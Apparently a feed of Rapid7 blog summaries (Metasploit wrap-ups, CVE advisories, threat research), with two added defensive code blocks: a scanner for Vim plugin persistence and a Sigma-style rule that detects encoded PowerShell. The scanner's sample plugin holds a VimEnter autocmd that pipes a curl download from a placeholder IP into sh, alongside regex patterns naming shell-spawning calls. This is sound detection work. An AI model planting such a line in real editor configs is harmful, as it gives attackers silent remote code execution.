Metasploit Wrap-Up 05/15/2026
Rapid7 Blog 15 May 2026 SEV 7/10
vulnerability malware
Products and Tools. Martin Sutovsky, May 15, 2026. Weaponizing a text editor for fun and profit: Gather round, dear readers, because today we (by we, we mean @h00die) dropped the ultimate persistence mechanism: Vim plugin persistence. And honestly, calling it "persistence" feels redundant. Vim is already the most persistent thing ever. Somewhere, somehow, there will still be a Vim session open since 2011, because no one has figured out how to close it.
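The wrap-up only names the technique, so here is the defender's side of it: a small scanner, added here as an example and not code from the Metasploit module or the blog post, that walks the files Vim and Neovim source at start-up and flags constructs a plugin-based implant needs (an autocmd that fires on editor start, paired with something that spawns a process or evaluates embedded code). The path list, the regexes and the two sample files are assumptions constructed for the example, not indicators taken from the post.

```python
#!/usr/bin/env python3
"""Flag Vim/Neovim start-up files that look like plugin persistence.

Added example, not code from the Metasploit module or the Rapid7 post. The
start-up locations and the suspicious-construct patterns are assumptions.
"""
import os
import re
import tempfile
from pathlib import Path

# Locations Vim/Neovim source automatically (assumed list; extend for your distro).
STARTUP_PATHS = [
    "~/.vimrc", "~/.vim/vimrc", "~/.vim/plugin", "~/.vim/after/plugin", "~/.vim/autoload",
    "~/.vim/pack", "~/.config/nvim/init.vim", "~/.config/nvim/init.lua", "~/.config/nvim/plugin",
    "/etc/vim/vimrc", "/etc/vim/vimrc.local", "/usr/share/vim/vimfiles/plugin",
]

# (rule name, regex). "exec" rules spawn processes or evaluate code; autocmd_start
# is the trigger that makes them run without user interaction.
SUSPICIOUS = [
    ("shell_call", re.compile(r"\b(?:system|systemlist|job_start|jobstart)\s*\(")),
    ("bang_command", re.compile(r"(?:^|\||['\"])\s*(?:silent!?\s+)?!(?![=~])\S")),
    ("embedded_lang", re.compile(r"\b(?:py3?|python3?|pyfile|py3file|pyxfile|lua|luafile|perl|ruby)\b\s+\S")),
    ("lua_os_execute", re.compile(r"\b(?:os\.execute|io\.popen|vim\.fn\.system|vim\.loop\.spawn)\s*\(")),
    ("autocmd_start", re.compile(
        r"\bautocmd!?\s+(?:\S+\s+)?(?:VimEnter|BufEnter|BufRead|BufWinEnter|BufNewFile)\b"
        r"|nvim_create_autocmd\s*\(\s*\{?\s*['\"](?:VimEnter|BufEnter|BufRead)", re.I)),
    ("obfuscation", re.compile(r"\bnr2char\s*\(|\bbase64|\\x[0-9a-f]{2}", re.I)),
]
EXEC_RULES = {"shell_call", "bang_command", "embedded_lang", "lua_os_execute"}


def scan_file(path: Path) -> list:
    """Return one finding per (line, rule) hit; Vimscript (") and Lua (--) comments are skipped."""
    findings = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return findings
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith(('"', "--")):
            continue
        for name, rx in SUSPICIOUS:
            if rx.search(line):
                findings.append({"path": str(path), "line": lineno, "rule": name, "text": stripped[:120]})
    return findings


def scan_paths(paths=STARTUP_PATHS) -> list:
    """Scan files and recurse into directories; only Vimscript, Lua and extension-less rc files."""
    findings = []
    for p in paths:
        root = Path(os.path.expanduser(p))
        if root.is_file():
            findings += scan_file(root)
        elif root.is_dir():
            for f in sorted(root.rglob("*")):
                if f.is_file() and f.suffix in (".vim", ".lua", ""):
                    findings += scan_file(f)
    return findings


def triage(findings: list) -> dict:
    """Per file: 'high' = start-up trigger plus exec construct (the persistence shape),
    'medium' = exec construct only (common in legitimate plugins), 'low' = anything else."""
    rules_by_file = {}
    for f in findings:
        rules_by_file.setdefault(f["path"], set()).add(f["rule"])
    levels = {}
    for path, rules in rules_by_file.items():
        if "autocmd_start" in rules and rules & EXEC_RULES:
            levels[path] = "high"
        elif rules & EXEC_RULES:
            levels[path] = "medium"
        else:
            levels[path] = "low"
    return levels


# Constructed sample inputs for the demo (not real plugin code).
EVIL_PLUGIN = '''" looks like a harmless helper plugin
set nocompatible
augroup totally_legit
  autocmd!
  autocmd VimEnter * call system('curl -s http://198.51.100.7/s | sh &')
augroup END
'''
BENIGN_VIMRC = '''set number
nnoremap <leader>w :w<CR>
if !exists('g:loaded_foo')
  let g:loaded_foo = 1
endif
'''


def demo():
    """Write the two samples to a temp dir, scan it, return (findings, triage)."""
    d = Path(tempfile.mkdtemp())
    (d / "plugin").mkdir()
    (d / "plugin" / "helper.vim").write_text(EVIL_PLUGIN)
    (d / "vimrc").write_text(BENIGN_VIMRC)
    found = scan_paths([str(d)])
    return found, triage(found)


if __name__ == "__main__":
    import sys
    hits = scan_paths(sys.argv[1:] or STARTUP_PATHS)
    for path, level in triage(hits).items():
        print(f"{level:6} {path}")
    for h in hits:
        print(f"  {h['rule']:14} {h['path']}:{h['line']}  {h['text']}")
```

Run it without arguments to scan the default locations for the current user, or pass directories (for example a mounted image's home directories) as arguments. The pairing is the point: `system()` alone appears in plenty of legitimate plugins, so only the combination of a start-up autocmd and an exec construct in the same file is rated high.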
CVE-2026-0265: Authentication Bypass in Palo Alto Networks PAN-OS
Rapid7 Blog 14 May 2026 SEV 6/10
vulnerability identity_threat
Vulnerabilities and Exploits. Rapid7, May 14, 2026. Overview: On May 13, 2026, Palo Alto Networks published a security advisory for CVE-2026-0265, a signature verification vulnerability that enables authentication bypass on PAN-OS, the operating system most Palo Alto Networks firewalls run. The vulnerability allows a remote, unauthenticated attacker with network access to bypass authentication when Cloud Authentication Service (CAS) is enabled and attached to a login interface; this configuration is non-default but common. CVE-2026-0265 affects PAN-OS on PA-Series and VM-Series firewalls, as well as Panorama (virtual and M-Series) appliances.
The Dark Side of Efficiency: When Network Controllers Become "God Mode" for Attackers
Rapid7 Blog 14 May 2026 SEV 1/10
Vulnerabilities and Exploits. Douglas McKee, Director, Vulnerability Intelligence, May 14, 2026. Imagine you build a massive corporate campus with every security control money can buy, maybe something similar to the infamous Death Star. Then, somewhere along the way, somebody decides the maintenance team needs a universal key that opens every door in the building without setting off any alarms.
CVE-2026-20182: Critical authentication bypass in Cisco Catalyst SD-WAN Controller (FIXED)
Rapid7 Blog 14 May 2026 SEV 8/10
vulnerability identity_threat
Vulnerabilities and Exploits. Jonah Burgess | Stephen Fewer, May 14, 2026. Overview: While researching CVE-2026-20127, a critical authentication bypass vulnerability that was exploited in the wild, Rapid7 Labs discovered a new authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller (formerly known as vSmart), CVE-2026-20182. The new vulnerability affects the "vdaemon" service over DTLS (UDP port 12346), the same service that was vulnerable to CVE-2026-20127. It is not a patch bypass of CVE-2026-20127.
When IT Support Calls: Dissecting a ModeloRAT Campaign from Teams to Domain Compromise
Rapid7 Blog 13 May 2026 SEV 9/10
vulnerability malware Scattered Spider Conti
Threat Research. Anna Širokova, May 13, 2026. Overview: Attackers do not need to break in through the front door when they can convince employees to open it for them through the tools they already trust. In April 2026, Rapid7 investigated an enterprise intrusion that began with a Microsoft Teams message from a fake "IT Support" account and quickly escalated into a full compromise chain involving malware deployment, privilege escalation, credential theft, lateral movement, and exfiltration. The incident illustrates a critical risk for modern enterprises: collaboration platforms have become part of the attack surface, and when combined with identity abuse and Living-off-the-Land techniques, they can provide attackers with a low-friction path into the environment.
Rapid7 Partner Academy: Driving Impact with Gold Stevie Award-Winning Partner Services Certifications
Rapid7 Blog 13 May 2026 SEV 2/10
vulnerability iot_ot_security Conti
Culture. Rapid7, May 13, 2026. At Rapid7, our commitment to our partners is built on the foundation of the PACT (Partnering with Accountability, Consistency, and Transparency) program. Central to this mission is the Rapid7 Partner Academy, which was recently honored with a Gold Stevie Award in the 2026 American Business Awards® for Achievement in Collaboration and Partnership. This recognition underscores our dedication to providing world-class training that translates directly into partner success and customer resilience.
Patch Tuesday - May 2026
Rapid7 Blog 13 May 2026 SEV 8/10
vulnerability cloud_security Play
Exposure Management. Adam Barnett, May 13, 2026. Microsoft is publishing 137 vulnerabilities on May 2026 Patch Tuesday. Microsoft is not aware of exploitation in the wild or public disclosure for any of these vulnerabilities. So far this month, Microsoft has provided patches to address 133 browser vulnerabilities, which are not included in the Patch Tuesday count above.
How Rapid7 is bringing Cyber GRC closer to security operations
Rapid7 Blog 12 May 2026 SEV 4/10
vulnerability iot_ot_security Salt Typhoon Conti
Security Operations. Sabeen Malik, May 8, 2026 (last updated May 12, 2026). Sabeen Malik is VP, Global Government Affairs and Public Policy at Rapid7. Security teams need a better way to connect what they detect, what they fix, and what they can prove. The pace of modern security operations no longer works in defenders' favor.
Final Countdown: Last Chance to Join the Rapid7 Global Cybersecurity Summit
Rapid7 Blog 11 May 2026 SEV 2/10
cloud_security iot_ot_security Conti
Over the past few weeks, we’ve shared a preview of what to expect, from the sessions and speakers to the themes running across the agenda. What has become increasingly clear is how closely these topics are connected. Security teams are being asked to move beyond reacting to incidents and instead understand how attacks begin, how they evolve, and how decisions can be made earlier with greater confidence.
Metasploit Wrap-Up 05/08/2026
Rapid7 Blog 08 May 2026 SEV 4/10
vulnerability malware
Products and Tools. Alan David Foster, May 8, 2026. Spring cleanup: This week's Metasploit updates focused on foundational improvements and expanded target reach. Key enhancements were made to the recently released Copy Fail exploit module, which now benefits from payload fixes in linux/x64/exec and linux/armle/exec. These changes expand its capability, enabling the use of the cmd/unix/python/meterpreter/reverse_tcp payload on x64 targets and introducing support for ARMLE Linux.
Zero Chaos: Scaling Detection Engineering at the Speed of Software, with Detection As Code
Rapid7 Blog 08 May 2026 SEV 1/10
malware vulnerability
Detection and Response. Zachary Zeid | James Gallahan, May 8, 2026. Every engineering team in your organization ships code through a pipeline. They branch, test, review, and deploy. If something breaks, they roll back.
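What "detection as code" means in practice is that a rule is data in a repository and ships with the tests that gate its deployment. The block below is an added example, not code from the post or from Rapid7's SIEM: a Sigma-style rule (selection, filter, condition) with a minimal evaluator and a test table of constructed process-creation events, so a CI job can fail the merge when the rule stops matching what it should or starts matching what it should not. The rule, the `rmm_agent.exe` filter and the events are assumptions made up for the example.

```python
#!/usr/bin/env python3
"""A detection rule as code: rule data + evaluator + CI-style test table.

Added example, not the post's or Rapid7's code. Rule content and sample
events are constructed for illustration.
"""
import re

# Sigma-style rule kept as data so it can be diffed, reviewed and rolled back like code.
RULE = {
    "title": "PowerShell launched with an encoded command",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["-enc ", "-encodedcommand ", "-ec "],
        },
        # Hypothetical approved admin tool whose child processes are excluded.
        "filter_rmm": {"ParentImage|endswith": "\\rmm_agent.exe"},
        "condition": "selection and not filter_rmm",
    },
    "level": "high",
}


def _field_matches(event: dict, spec_key: str, expected) -> bool:
    """Case-insensitive field test supporting |contains, |endswith, |startswith, |re."""
    field, _, modifier = spec_key.partition("|")
    actual = event.get(field)
    if actual is None:
        return False
    actual = str(actual).lower()
    for e in expected if isinstance(expected, list) else [expected]:
        e = str(e).lower()
        if (modifier == "" and actual == e) or (modifier == "contains" and e in actual):
            return True
        if (modifier == "endswith" and actual.endswith(e)) or (modifier == "startswith" and actual.startswith(e)):
            return True
        if modifier == "re" and re.search(e, actual):
            return True
    return False


def _selection_matches(event: dict, selection: dict) -> bool:
    """All fields of a named selection must match (Sigma map semantics)."""
    return all(_field_matches(event, k, v) for k, v in selection.items())


def _eval_condition(cond: str, results: dict) -> bool:
    """Tiny recursive-descent parser for 'a and not b or (c and d)' over named selections."""
    tokens = re.findall(r"\(|\)|\w+", cond)
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        return tok

    def parse_or():
        value = parse_and()
        while peek() == "or":
            take()
            rhs = parse_and()          # evaluate before combining: no short-circuit
            value = value or rhs
        return value

    def parse_and():
        value = parse_not()
        while peek() == "and":
            take()
            rhs = parse_not()
            value = value and rhs
        return value

    def parse_not():
        if peek() == "not":
            take()
            return not parse_not()
        if peek() == "(":
            take()
            value = parse_or()
            take()                     # closing paren
            return value
        return results[take()]

    return parse_or()


def evaluate(rule: dict, event: dict) -> bool:
    """True when the event satisfies the rule's condition."""
    det = rule["detection"]
    results = {name: _selection_matches(event, sel) for name, sel in det.items() if name != "condition"}
    return _eval_condition(det["condition"], results)


# Constructed test events: (event, expected verdict). These ship with the rule.
TEST_CASES = [
    ({"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
      "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"}, True),
    ({"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
      "CommandLine": "pwsh.exe -EncodedCommand ZQBjAGgAbwA=",
      "ParentImage": "C:\\Program Files\\RMM\\rmm_agent.exe"}, False),
    ({"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "CommandLine": "powershell.exe -Command Get-Date",
      "ParentImage": "C:\\Windows\\explorer.exe"}, False),
    ({"Image": "C:\\Windows\\System32\\notepad.exe",
      "CommandLine": "notepad.exe -enc notes.txt",
      "ParentImage": "C:\\Windows\\explorer.exe"}, False),
]


def run_tests(rule: dict, cases: list) -> list:
    """CI gate: return [(index, expected, actual)] for every case the rule gets wrong."""
    failures = []
    for i, (event, expected) in enumerate(cases):
        actual = evaluate(rule, event)
        if actual != expected:
            failures.append((i, expected, actual))
    return failures


if __name__ == "__main__":
    bad = run_tests(RULE, TEST_CASES)
    print("PASS" if not bad else f"FAIL: {bad}")
```

In a pipeline the `run_tests` result is the merge gate: a change to the rule, or a new filter added to silence noise, must keep every true positive in the table firing and every true negative quiet, and reverting the rule file is the rollback.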
Rapid7 and OpenAI: Helping Defenders Move at Machine Speed
Rapid7 Blog 07 May 2026 SEV 3/10
vulnerability iot_ot_security
Artificial Intelligence. Wade Woolwine, May 7, 2026. Wade Woolwine is Senior Director, Product Security at Rapid7. Announcing OpenAI's Trusted Access for Cyber program: CIOs and CISOs are telling us the same thing in different ways: advances in frontier AI are accelerating the threat environment and putting pressure on security operating models built for a different pace. Vulnerabilities can be discovered faster, exploitation windows are shrinking, and attackers are increasingly using automation to move with greater speed and scale.
Why Security in 2026 Requires Continuous Threat and Exposure Management (CTEM) at Scale
Rapid7 Blog 07 May 2026 SEV 4/10
vulnerability cloud_security Conti
Exposure Management. James Davis, May 7, 2026. Let's be honest, the patching window just shrank to something no practitioner or organization can keep up with. Organizations now need to operate in an environment that must assume breach, which means fundamentals like attack surface management, micro-segmentation, identity management, and attack path validation, a few core pillars of CTEM, just became the most important initiatives within the cybersecurity department. Rapid7 is the only vendor that provides a truly unified platform to master Continuous Threat Exposure Management (CTEM).
Critical Buffer Overflow in Palo Alto Networks PAN-OS User-ID Authentication Portal (CVE-2026-0300)
Rapid7 Blog 06 May 2026 SEV 7/10
vulnerability identity_threat
Vulnerabilities and Exploits. Jonah Burgess, May 6, 2026 (last updated May 13, 2026). Overview: On May 6, 2026, Palo Alto Networks published a security advisory for CVE-2026-0300, a critical unauthenticated buffer overflow vulnerability affecting PAN-OS PA-Series and VM-Series firewall appliances. Prisma Access, Cloud NGFW, and Panorama appliances are not affected by this vulnerability. The vulnerability carries a CVSSv4 score of and has been confirmed as exploited in the wild by the vendor.
Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware
Rapid7 Blog 06 May 2026 SEV 5/10
malware ransomware MuddyWater Conti
Threat Research. Alexandra Blia | Ivan Feigl, May 6, 2026 (last updated May 7, 2026). Executive summary: In early 2026, a sophisticated intrusion initially appearing to be a standard Chaos ransomware attack was assessed to be consistent with a targeted state-sponsored operation. While the threat actor operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, forensic analysis revealed the incident was a "false flag" masquerade. Technical artifacts, including a specific code-signing certificate and Command-and-Control (C2) infrastructure, suggest with moderate confidence that this activity is linked to MuddyWater (Seedworm), an Iranian Advanced Persistent Threat (APT) affiliated with the Ministry of Intelligence and Security (MOIS).
A Walkthrough of the 2026 Global Cybersecurity Summit Agenda
Rapid7 Blog 05 May 2026 SEV 2/10
cloud_security vulnerability Conti Play
Industry Trends. Emma Burdett, May 5, 2026. The full agenda for the Rapid7 2026 Global Cybersecurity Summit is now live, and it gives a clearer sense of how the conversation around security operations is evolving. Across two days, the sessions progress from a shared understanding of how threats are changing into a more detailed look at how teams detect, respond, and make decisions in practice. Day 1: How threats evolve and how teams respond. The day opens with a keynote, Defense Starts Earlier Than You Think, where Brian Castagna is joined by Craig Robinson, Research Vice President at IDC, to examine why complexity has become the main barrier to effective security and what changes when teams start acting earlier.
Metasploit Wrap-Up 05/01/2026
Rapid7 Blog 01 May 2026 SEV 4/10
vulnerability malware
Products and Tools. Christopher Granleese, May 1, 2026. MCP server: This release, our very own cdelafuente-r7 finished implementing the Metasploit MCP Server (msfmcpd), bringing Model Context Protocol support to Metasploit Framework. MCP lets AI applications like Claude, Cursor, or your own custom agents query Metasploit data. Think of it as a middleware layer that exposes 8 standardized tools for searching modules and pulling reconnaissance data, all built on the official Ruby MCP SDK.
Five Things we Took Away from Gartner SRM Sydney 2026
Rapid7 Blog 29 Apr 2026 SEV 1/10
vulnerability data_breach
Industry Trends. Rapid7, Apr 29, 2026. At this year's Gartner Security and Risk Management Summit in Sydney, Rapid7 CISO Brian Castagna joined industry CISO Nigel Hedges for a fireside chat on the decisions security leaders are actually making right now, about budgets, burnout, AI, and perspective on consolidation. The conversation reinforced what we see across many organizations: SecOps is very much focused on protecting business resilience, enabling confident decisions by senior security leaders, and building programs that scale across people, platforms, and emerging technology.
CVE-2026-41940: cPanel & WHM Authentication Bypass
Rapid7 Blog 29 Apr 2026 SEV 9/10
vulnerability identity_threat
Vulnerabilities and Exploits. Rapid7, Apr 29, 2026 (last updated May 5, 2026). Overview: On April 28, 2026, cPanel issued a security update to fix a critical vulnerability affecting the cPanel & WHM and WP Squared products. In the cPanel release notes, the bug was described as "an issue with session loading and saving." CVE-2026-41940, the identifier subsequently assigned on April 29, 2026, has a CVSS score of and allows unauthenticated remote attackers to bypass authentication and gain unauthorized administrative access to affected systems. First-party vendor advisories are available.
Experts on Experts: The 2026 Threat Landscape is Moving Faster than Defenders Expect
Rapid7 Blog 29 Apr 2026 SEV 2/10
vulnerability iot_ot_security Conti Play
Industry Trends. Craig Adams, Apr 29, 2026. This week on Experts on Experts, I'm joined by Christiaan Beek, Rapid7's VP of Threat Analytics, to talk through what we're seeing in the 2026 threat landscape and how it connects to recent research coming out of Rapid7 Labs. We start with the report, but quickly move into what's already playing out in active campaigns. What stands out is not a change in attacker technique, but the pace.